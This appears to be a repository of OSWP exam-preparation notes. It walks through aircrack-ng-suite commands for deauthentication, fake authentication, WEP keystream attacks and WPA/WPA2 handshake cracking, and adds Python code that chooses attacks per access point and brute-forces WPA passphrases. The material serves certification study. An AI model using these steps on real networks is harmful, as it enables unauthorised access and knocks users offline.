├── 0 - Exam Roadmap & Attack Map
├── 1 - Aircrack-ng Essentials
├── 2 - WEP Cracking Attacks
├── 3 - WPA & WPA2 Cracking Attacks
└── README.md

/0 - Exam Roadmap & Attack Map:
--------------------------------------------------------------------------------
## Exam Roadmap

ssh <user>@<host> -p <port>                          ## connecting to the target system with the SSH information provided by @offsec
iw dev wlan0 scan | grep SSID                        ## listing the wireless networks within range of the wireless card (wlan0)
airmon-ng start wlan0                                ## putting the wireless card (wlan0) into monitor mode (creates mon0; newer airmon-ng versions name it wlan0mon)
airodump-ng mon0                                     ## discovering surrounding networks by listening in monitor mode
iwconfig mon0 channel 3                              ## changing the channel the wireless card listens on
iwlist mon0 channel                                  ## viewing the channel the wireless card is on
airodump-ng -c 3 --bssid <BSSID> -w <file> mon0      ## listening to the target AP on the specified channel and writing the capture to <file>-01.cap (plus <file>-01.csv)

----------------------------------------------------------------------------------------------------------------------------------------------------------------

## Opening more than one terminal with the "screen" tool;

# screen -S test          ## creating a named session (workspace)
# screen -ls              ## listing active screen sessions (note: -ls, not -l)
# screen -r 13245         ## reattaching to a specific session by PID (or by the name given with -S)
# CTRL + a + n            ## switching to the next window
# CTRL + a + p            ## switching to the previous window

----------------------------------------------------------------------------------------------------------------------------------------------------------------

### Attack Map ###

WEP? or WPA/WPA2?

> WEP;

AUTH: OPN? or SKA?

> AUTH: OPN;

Any client connected to AP? YES? or NO?
> YES;

# ARP Request Replay Attack
# Interactive Packet Replay Attack
# Deauthentication Attack (can be used in both cases (yes or no); with a client it forces fresh ARP requests, which speeds up the replay attacks)

> NO;

# Fake Authentication Attack (can be used in both cases (yes or no); it makes the AP accept injected frames from our MAC)
# Fragmentation Attack
# Korek ChopChop Attack

> AUTH: SKA (Bypassing WEP Shared Key Authentication);

## A client connected to the AP is required (its shared-key challenge/response is what leaks the keystream). You can follow the steps below to attack;

# Deauthentication Attack (forces the client to re-authenticate so the PRGA keystream is captured)
# Fake Shared Key Authentication Attack
# ARP Request Replay Attack
# Deauthentication Attack (forces the client to send fresh ARP requests)
# Aircrack-ng

> WPA/WPA2

## Attack;

# Deauthentication Attack (a connected client is required; the 4-way handshake is captured when it reconnects)

## Cracking the network key;

# with Aircrack-ng
# with JTR and Aircrack-ng
# with coWPAtty
# with Pyrit

--------------------------------------------------------------------------------
/1 - Aircrack-ng Essentials:
--------------------------------------------------------------------------------
# Notes

> wlan0 ## network interface of the wireless card (managed mode)
> mon0  ## network interface of the wireless card in monitor mode (newer airmon-ng versions name it wlan0mon instead)

# airmon-ng check                 ## listing processes that can interfere with monitor mode (NetworkManager, wpa_supplicant, ...)
# airmon-ng check kill            ## killing those processes (run before airmon-ng start)
# airmon-ng start wlan0           ## enabling monitor mode
# iwconfig mon0 channel 3         ## changing the channel the wireless card is on
# iwlist mon0 channel             ## viewing the channel the wireless card is on
# airmon-ng stop mon0             ## disabling monitor mode
# iw dev wlan0 scan | grep SSID   ## listing the wireless networks within range of the wireless card (wlan0)

# airodump-ng mon0                                       ## a basic listening session
# airodump-ng -c 3 --bssid <BSSID> -w cap1 mon0          ## listening to a specific AP's network and saving the capture to cap1-01.cap
# airodump-ng -c 3 --bssid <BSSID> -w cap1 --ivs mon0    ## saving only the IVs (WEP only: a WPA handshake cannot be cracked from an .ivs file), reducing disk space
used by the capture file while listening to the network

# aireplay-ng    ## general usage: aireplay-ng <attack> [filter/options] <interface>

Attack   Attack Name
------   -----------
# 0   ## Deauthentication
# 1   ## Fake Authentication
# 2   ## Interactive Packet Replay
# 3   ## ARP Request Replay Attack
# 4   ## KoreK ChopChop Attack
# 5   ## Fragmentation Attack
# 6   ## Café-Latte Attack
# 7   ## Client-Oriented Fragmentation Attack
# 9   ## Injection Test

# aireplay-ng -9 mon0                              ## basic injection test (the card must pass this before any of the attacks below)
# aireplay-ng -9 -e <ESSID> -a <BSSID> mon0        ## injection test against a hidden or specific SSID
# aireplay-ng -9 -i <second interface> mon0        ## card-to-card injection test (the second card plays the AP)

--------------------------------------------------------------------------------
/2 - WEP Cracking Attacks:
--------------------------------------------------------------------------------

## Fake Authentication Attack

airmon-ng start wlan0                                        ## setting the wireless card (wlan0) to monitor mode
macchanger --show mon0                                       ## learning the MAC address of the mon0 (monitor mode) network interface; it is <our MAC> below
airodump-ng -c <channel> --bssid <BSSID> -w <file> mon0      ## listening to the target AP on the specified channel
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <our MAC> mon0     ## performing a fake authentication attack against the AP (0 = authenticate once, no re-auth delay) so it accepts injected frames from <our MAC>

## Deauthentication Attack

airmon-ng start wlan0                                        ## setting the wireless card (wlan0) to monitor mode
airodump-ng -c <channel> --bssid <BSSID> -w <file> mon0      ## listening to the target AP on the specified channel
aireplay-ng -0 1 -a <BSSID> -c <client MAC> mon0             ## performing a deauthentication attack against the client on behalf of the AP (1 = number of deauth bursts, 0 = unlimited)

## ARP Request Replay Attack

airmon-ng start wlan0                                        ## setting the wireless card (wlan0) to monitor mode
airodump-ng -c <channel> --bssid <BSSID> -w <file> mon0      ## listening to the target AP on the specified channel
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <our MAC> mon0     ## performing a fake authentication attack against the AP
aireplay-ng -3 -b <BSSID> -h <our MAC> mon0                  ## performing an ARP Request Replay attack: waits for an ARP request from a client and replays it so the AP answers with new IVs
aireplay-ng -0 1 -a <BSSID> -c <client MAC> mon0             ## performing a deauthentication attack
against the AP's client (the reconnecting client sends fresh ARP requests, which gives the replay attack packets to work with)
aircrack-ng <file>-01.cap                                    ## cracking the WEP key (you need enough IVs during the attack: with the PTW method roughly 20,000 for a 40-bit key and 40,000-85,000 for a 104-bit key; aircrack-ng re-reads the growing capture, so it can be left running)

## Interactive Packet Replay Attack

airmon-ng start wlan0                                        ## setting the wireless card (wlan0) to monitor mode
airodump-ng -c <channel> --bssid <BSSID> -w <file> mon0      ## listening to the target AP on the specified channel
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <our MAC> mon0     ## performing a fake authentication attack against the AP
aireplay-ng -2 -b <BSSID> -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0   ## performing an interactive packet replay attack: filters for a broadcast packet (-d) coming from the AP (-f 1, FromDS) of ARP size (68-86 bytes) and replays it after confirmation
aircrack-ng -z <file>-01.cap                                 ## cracking the WEP key with the PTW method (-z; the default in recent versions)

## Fragmentation Attack

airmon-ng start wlan0                                        ## setting the wireless card (wlan0) to monitor mode
airodump-ng -c <channel> --bssid <BSSID> -w <file> mon0      ## listening to the target AP on the specified channel
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <our MAC> mon0     ## performing a fake authentication attack against the AP
aireplay-ng -5 -b <BSSID> -h <our MAC> mon0                  ## performing a fragmentation attack against the AP: recovers about 1500 bytes of PRGA keystream and saves it as fragment-*.xor
packetforge-ng -0 -a <BSSID> -h <our MAC> -k 255.255.255.255 -l 255.255.255.255 -y <fragment-*.xor> -w <arp-request>   ## forging an encrypted ARP request (-0) with the recovered keystream; -k/-l are the destination/source IPs (broadcast works against most APs)
tcpdump -n -vvv -e -s0 -r <arp-request>                      ## checking the contents of the forged packet
aireplay-ng -2 -r <arp-request> mon0                         ## injecting the forged packet into the network (if the AP accepts it, the #Data/IV count rises rapidly)
aircrack-ng <file>-01.cap                                    ## cracking the WEP key (you need enough IVs during the attack; see the counts above)
## Korek ChopChop Attack

airmon-ng start wlan0                                        ## setting the wireless card (wlan0) to monitor mode
airodump-ng -c <channel> --bssid <BSSID> -w <file> mon0      ## listening to the target AP on the specified channel
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <our MAC> mon0     ## performing a fake authentication attack against the AP
aireplay-ng -4 -b <BSSID> -h <our MAC> mon0                  ## performing a KoreK chopchop attack against the AP: decrypts one captured data packet byte by byte without knowing the key and saves the keystream as replay_dec-*.xor (try it when fragmentation fails, and vice versa)
packetforge-ng -0 -a <BSSID> -h <our MAC> -k 255.255.255.255 -l 255.255.255.255 -y <replay_dec-*.xor> -w <arp-request>   ## forging an encrypted ARP request (-0) with the recovered keystream
tcpdump -n -vvv -e -s0 -r <arp-request>                      ## checking the contents of the forged packet
aireplay-ng -2 -r <arp-request> mon0                         ## injecting the forged packet into the network (if the AP accepts it, the #Data/IV count rises rapidly)
aircrack-ng <file>-01.cap                                    ## cracking the WEP key (you need enough IVs during the attack)

## Bypassing WEP Shared Key Authentication

airmon-ng start wlan0                                        ## setting the wireless card (wlan0) to monitor mode
airodump-ng -c <channel> --bssid <BSSID> -w <file> mon0      ## listening to the target AP; when a client performs shared-key authentication, airodump-ng shows SKA in the AUTH column and writes the PRGA keystream to <file>-01-<BSSID>.xor
aireplay-ng -0 1 -a <BSSID> -c <client MAC> mon0             ## performing a deauthentication attack so the client re-authenticates and its challenge/response (and therefore the keystream) is captured
aireplay-ng -1 0 -e <ESSID> -y <file>-01-<BSSID>.xor -a <BSSID> -h <our MAC> mon0   ## performing a fake shared key authentication with the captured keystream (a plain fake auth without -y is rejected on SKA networks)
aireplay-ng -3 -b <BSSID> -h <our MAC> mon0                  ## performing an ARP Request Replay attack against the AP
aireplay-ng -0 1 -a <BSSID> -c <client MAC> mon0             ## performing a deauthentication attack so the client sends fresh ARP requests
aircrack-ng <file>-01.cap                                    ## cracking the WEP key (you need enough IVs during the attack)
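The Attack Map in section 0 and the "enough IVs" notes above both key off what airodump-ng shows for an AP. As an added example that is not part of the original cheat sheet, the script below parses the CSV airodump-ng writes beside its capture (<file>-01.csv), attaches stations to their APs, picks the Attack Map branch (WEP/OPN with or without client, WEP/SKA, WPA/WPA2, open) and reports whether the IV count is in the range where PTW usually succeeds. The CSV content and the MACs in it are constructed sample data, and the IV thresholds are rule-of-thumb values from the aircrack-ng documentation, labelled as assumptions in the code.

```python
# Added example (not part of the original cheat sheet): parse the CSV that
# airodump-ng writes next to its capture (<file>-01.csv) and apply the Attack
# Map from section 0 to every AP it lists. SAMPLE_CSV is constructed sample
# data in airodump-ng's layout; no real network was captured.
import csv
import io

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2013-09-01 10:00:00, 2013-09-01 10:20:00,  3,  54, WEP , WEP, SKA,  -41,      812,    23517,   0.  0.  0.  0,   7, wep_ska,
00:11:22:33:44:66, 2013-09-01 10:00:00, 2013-09-01 10:20:00,  6,  54, WEP , WEP, OPN,  -55,      402,     1080,   0.  0.  0.  0,   7, wep_opn,
00:11:22:33:44:77, 2013-09-01 10:00:00, 2013-09-01 10:20:00, 11,  54, WPA2, CCMP, PSK,  -60,      390,        0,   0.  0.  0.  0,   8, wpa2_psk,
00:11:22:33:44:88, 2013-09-01 10:00:00, 2013-09-01 10:20:00,  1,  54, OPN , , ,  -70,      120,        0,   0.  0.  0.  0,   5, guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2013-09-01 10:01:00, 2013-09-01 10:20:00,  -50,      1500, 00:11:22:33:44:55, wep_ska
AA:BB:CC:DD:EE:02, 2013-09-01 10:02:00, 2013-09-01 10:20:00,  -61,       300, 00:11:22:33:44:77, wpa2_psk
AA:BB:CC:DD:EE:03, 2013-09-01 10:03:00, 2013-09-01 10:20:00,  -72,        10, (not associated), guest,wep_opn
"""

# Rule-of-thumb IV counts for aircrack-ng's PTW attack (assumption for this
# example; the real number depends on the key length and on how the IVs were
# collected): ~20,000 for a 40-bit key, ~40,000 and up for a 104-bit key.
PTW_IVS_40BIT = 20_000
PTW_IVS_104BIT = 40_000


def _rows(section):
    """Yield stripped field lists from one CSV section, skipping its header row."""
    for row in csv.reader(io.StringIO(section.strip()), skipinitialspace=True):
        row = [f.strip() for f in row]
        if row and row[0] not in ("BSSID", "Station MAC"):
            yield row


def parse_airodump_csv(text):
    """Return ({bssid: ap_record}, {station_mac: bssid or '(not associated)'}).

    airodump-ng separates the AP table from the station table with a blank
    line. An ESSID containing a comma would shift the columns; ignored here."""
    ap_part, _, sta_part = text.partition("\n\n")
    aps, stations = {}, {}
    for row in _rows(ap_part):
        if len(row) < 14:
            continue
        aps[row[0]] = {"channel": int(row[3]), "privacy": row[5], "auth": row[7],
                       "ivs": int(row[10]), "essid": row[13], "clients": []}
    for row in _rows(sta_part):
        if len(row) < 6:
            continue
        stations[row[0]] = row[5]
        if row[5] in aps:                      # associated client -> attach to its AP
            aps[row[5]]["clients"].append(row[0])
    return aps, stations


def attack_plan(ap):
    """Map one AP record onto the branches of the Attack Map (aireplay-ng attack numbers in brackets)."""
    priv, has_client = ap["privacy"], bool(ap["clients"])
    if "WPA" in priv:
        if not has_client:
            return "WPA/WPA2 without client: wait; a 4-way handshake needs a client to deauth"
        return "WPA/WPA2: deauth client (-0), capture handshake, crack offline (aircrack-ng -w / JTR / coWPAtty / Pyrit)"
    if "WEP" in priv:
        if ap["auth"] == "SKA":
            return "WEP/SKA: deauth client (-0) to capture the PRGA .xor, fake shared-key auth (-1 -y), ARP replay (-3)"
        if has_client:
            return "WEP/OPN with client: fake auth (-1), ARP request replay (-3) or interactive replay (-2), deauth (-0) to speed up"
        return "WEP/OPN without client: fake auth (-1), fragmentation (-5) or chopchop (-4), packetforge-ng, replay (-2)"
    return "OPN: no key to crack"


def enough_ivs(ap, key_bits=104):
    """True if the IV count is above the rule-of-thumb PTW threshold for the key length."""
    return ap["ivs"] >= (PTW_IVS_40BIT if key_bits == 40 else PTW_IVS_104BIT)


def report(text):
    """One line per AP plus the chosen attack branch, sorted by channel."""
    aps, _ = parse_airodump_csv(text)
    lines = []
    for bssid, ap in sorted(aps.items(), key=lambda kv: kv[1]["channel"]):
        lines.append(f"{ap['essid']:10} {bssid} ch{ap['channel']:<2} {ap['privacy']:5} "
                     f"{ap['auth'] or '-':4} clients={len(ap['clients'])} ivs={ap['ivs']}")
        lines.append(f"    -> {attack_plan(ap)}")
        if "WEP" in ap["privacy"]:
            lines.append(f"    -> enough IVs for PTW? 40-bit: {enough_ivs(ap, 40)}, 104-bit: {enough_ivs(ap, 104)}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_CSV))
```

To use it on a live capture, read `<file>-01.csv` instead of `SAMPLE_CSV`; airodump-ng rewrites that file every few seconds, so the script can be looped while an attack runs to see the IV count cross the threshold before starting aircrack-ng.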
--------------------------------------------------------------------------------
/3 - WPA & WPA2 Cracking Attacks:
--------------------------------------------------------------------------------

## Cracking with Aircrack-ng

airmon-ng start wlan0                                        ## setting the wireless card (wlan0) to monitor mode
airodump-ng -c <channel> --bssid <BSSID> -w <file> mon0      ## listening to the target AP on the specified channel; "WPA handshake: <BSSID>" appears in the top right once the 4-way handshake is captured (do not use --ivs here)
aireplay-ng -0 1 -a <BSSID> -c <client MAC> mon0             ## performing a deauthentication attack so the client reconnects and repeats the 4-way handshake
aircrack-ng -w <wordlist> <file>-01.cap                      ## cracking the WPA/WPA2-PSK passphrase with a dictionary attack against the captured handshake (found only if the passphrase is in the wordlist)

## Cracking with JTR and Aircrack-ng

airmon-ng start wlan0                                        ## setting the wireless card (wlan0) to monitor mode
airodump-ng -c <channel> --bssid <BSSID> -w <file> mon0      ## listening to the target AP on the specified channel
aireplay-ng -0 1 -a <BSSID> -c <client MAC> mon0             ## performing a deauthentication attack against the AP to capture the handshake
./john --wordlist=<wordlist> --rules --stdout | aircrack-ng -e <ESSID> -w - <file>-01.cap   ## JTR mangles the wordlist with its rules and pipes the candidates to aircrack-ng (-w - reads them from stdin)

## Cracking with coWPAtty

airmon-ng start wlan0                                        ## setting the wireless card (wlan0) to monitor mode
airodump-ng -c <channel> --bssid <BSSID> -w <file> mon0      ## listening to the target AP on the specified channel
aireplay-ng -0 1 -a <BSSID> -c <client MAC> mon0             ## performing a deauthentication attack against the AP to capture the handshake
cowpatty -r <file>-01.cap -f <wordlist> -2 -s <ESSID>        ## cracking the WPA passphrase with coWPAtty in dictionary mode (-2 = non-strict mode, accepts a capture holding only frames 1+2 or 2+3 of the handshake)
or
genpmk -f <wordlist> -d <hashfile> -s <ESSID>                ## precomputing the PMKs (PBKDF2 over the ESSID) once for this ESSID; the expensive step is then reusable for every capture of that network
cowpatty -r <file>-01.cap -d <hashfile> -2 -s <ESSID>        ## cracking the WPA passphrase with coWPAtty using the precomputed hashes

## Cracking with Pyrit

airmon-ng start wlan0                                        ## setting the wireless card (wlan0) to monitor mode
pyrit -r mon0 -o <file>.cap stripLive                        ## sniffing on the monitor interface with pyrit and writing only handshake-relevant frames to <file>.cap
aireplay-ng -0 1 -a <BSSID> -c <client MAC> mon0             ## performing a deauthentication attack against the AP to capture the handshake
pyrit -r <file>.cap -i <wordlist> -b <BSSID>
attack_passthrough                                           ## cracking the WPA passphrase with pyrit directly from the wordlist (no database)
or
pyrit -i <wordlist> import_passwords                         ## importing the wordlist into pyrit's database
pyrit -e <ESSID> create_essid                                ## adding the ESSID of the access point to the pyrit database
pyrit batch                                                  ## precomputing PMKs for every imported password against every stored ESSID
pyrit -r <file>.cap -b <BSSID> attack_db                     ## cracking the WPA passphrase in database mode with the precomputed PMKs

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# OSWP

![OSWP](https://blog.own.sh/img/oscp-osce-oswp-review/offsec-student-certified-emblem-rgb-oswp.png)

This repo contains the resources I used during the OSWP exam. It is prepared "only" for the exam syllabus. I prepared it in an explanatory way; I hope you find it useful. Good luck guys!🥂😈
--------------------------------------------------------------------------------
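All four WPA/WPA2 cracking paths above do the same computation, and the genpmk / `pyrit batch` precomputation only works because of where the ESSID enters it. As an added example that is neither from the original cheat sheet nor from aircrack-ng, coWPAtty or Pyrit, the script below implements that check: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes), the PTK expanded from the PMK with both MACs and both nonces via PRF-512, and the MIC over message 2 of the 4-way handshake keyed with the first 16 bytes of the PTK (the KCK). A candidate is correct when the recomputed MIC equals the captured one; that is also why coWPAtty's -2 mode can work with frames 1+2 or 2+3 only (ANonce from 1 or 3, SNonce and MIC from 2). The handshake here is constructed (made-up MACs and nonces, an EAPOL message 2 signed with a known passphrase), the PMK is checked against the IEEE 802.11i test vector for "password"/"IEEE", and the `pmk_cache` dictionary stands in for the genpmk/Pyrit database.

```python
# Added example, not code from the original cheat sheet or from aircrack-ng,
# coWPAtty or Pyrit: the check those tools run on a captured 4-way handshake.
# The sample handshake is constructed below and signed with a known passphrase.
import hashlib
import hmac

EAPOL_MIC_OFFSET = 81  # 802.1X header (4) + EAPOL-Key fields before the MIC (77)


def derive_pmk(passphrase: str, essid: str) -> bytes:
    """WPA/WPA2-PSK pairwise master key; depends only on passphrase and ESSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def prf512(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512: PTK from the PMK, the two MACs and the two nonces (min/max ordered)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol: bytes, version: int = 2) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed.
    Key descriptor version 2 (WPA2/CCMP) uses HMAC-SHA1, version 1 (WPA/TKIP)
    HMAC-MD5; both are truncated to 16 bytes."""
    zeroed = eapol[:EAPOL_MIC_OFFSET] + b"\x00" * 16 + eapol[EAPOL_MIC_OFFSET + 16:]
    digestmod = hashlib.sha1 if version == 2 else hashlib.md5
    return hmac.new(kck, zeroed, digestmod).digest()[:16]


def crack(hs: dict, wordlist, pmk_cache=None):
    """Return the candidate whose recomputed MIC matches the captured one, else None.
    pmk_cache plays the role of genpmk / pyrit batch: a PMK depends only on
    (passphrase, ESSID), so it is computed once and reused for every handshake
    captured from that ESSID; only the cheap PRF-512 + MIC step is per capture."""
    if pmk_cache is None:
        pmk_cache = {}
    for cand in wordlist:
        pmk = pmk_cache.get(cand)
        if pmk is None:
            pmk = pmk_cache[cand] = derive_pmk(cand, hs["essid"])
        kck = prf512(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"], hs["version"]), hs["mic"]):
            return cand
    return None


def make_test_handshake(passphrase: str, essid: str = "IEEE", version: int = 2) -> dict:
    """Constructed sample handshake: made-up MACs and nonces and a minimal EAPOL
    message 2 (key info: MIC flag, pairwise, descriptor version), signed with
    `passphrase` so the cracker can be exercised offline."""
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("aabbccddeeff")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    key_info = (0x0108 | version).to_bytes(2, "big")
    body = (b"\x02" + key_info + b"\x00\x10" + b"\x00" * 8 + snonce      # descriptor type, key info, key len, replay ctr, SNonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8                   # key IV, RSC, key ID
            + b"\x00" * 16 + b"\x00\x00")                                # MIC (zero for now), key data length
    eapol = b"\x01\x03" + len(body).to_bytes(2, "big") + body            # 802.1X v1, type 3 (EAPOL-Key)
    kck = prf512(derive_pmk(passphrase, essid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol, version)
    eapol = eapol[:EAPOL_MIC_OFFSET] + mic + eapol[EAPOL_MIC_OFFSET + 16:]
    return {"essid": essid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": mic, "version": version}


if __name__ == "__main__":
    print("PMK(password, IEEE) =", derive_pmk("password", "IEEE").hex())
    hs = make_test_handshake("password")
    cache = {}
    print("cracked:", crack(hs, ["letmein", "password", "hunter2"], cache))
    # a second capture of the same ESSID (here a WPA/TKIP-style one) reuses the cached PMKs
    print("cracked again:", crack(make_test_handshake("password", version=1), ["password"], cache))
```

Running a real capture through this would need a pcap parser to pull the BSSID, station MAC, ANonce, SNonce and the message-2 EAPOL frame; everything from `derive_pmk` onwards is the same. The PBKDF2 step is what dominates: 4096 HMAC-SHA1 iterations per candidate, independent of the capture, which is exactly the work genpmk and `pyrit batch` move ahead of time.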